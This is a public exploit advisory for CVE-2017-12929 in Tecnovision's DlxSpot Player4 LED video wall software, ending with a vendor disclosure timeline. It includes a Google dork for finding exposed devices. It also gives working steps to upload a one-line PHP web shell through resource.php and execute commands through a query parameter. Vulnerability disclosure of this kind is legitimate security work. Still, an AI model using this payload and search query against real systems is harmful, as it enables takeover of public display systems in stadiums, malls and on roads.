# Exploit Title: DlxSpot - Player4 LED video wall - Arbitrary File Upload
to RCE
# Google Dork: "DlxSpot - Player4"# Date: 2017-05-14# Discoverer: Simon Brannstrom# Authors Website: https://unknownpwn.github.io/# Vendor Homepage: http://www.tecnovision.com/# Software Link: n/a# Version: >1.5.10# Tested on: Linux# About: DlxSpot is the software controlling Tecnovision LED Video Wallsall over the world, they are used in football arenas, concert halls,
shopping malls,as roadsigns etc.# CVE: CVE-2017-12929# Linked CVE's: CVE-2017-12928, CVE-2017-12930.# Visit my github page at
https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md
for complete takeover of the box,from SQLi to root access.###############################################################################################################################
Arbitrary File Upload leading to Remote Command Execution:1. Visit http://host/resource.php and upload PHP shell. For example:<?php
system($_GET["c"]); ?>2. RCE via http://host/resource/source/shell.php?c=id3. Output: www-data
TIMELINE:2017-05-14- Discovery of vulnerabilities.2017-05-15- Contacted Tecnovision through contact form on manufacturer
homepage.2017-06-01- No response, tried contacting again through several contact
forms on homepage.2017-08-10- Contacted Common Vulnerabilities and Exposures (CVE)
requesting CVE assignment.2017-08-17- Three CVE's assigned for the vulnerabilities found.2017-08-22- With helpfrom fellow hacker and friend, byt3bl33d3r, sent an
email in Italian to the company.2017-09-18- No response, full public disclosure.
DEDICATED TO MARCUS ASTROM
FOREVER LOVED - NEVER FORGOTTEN
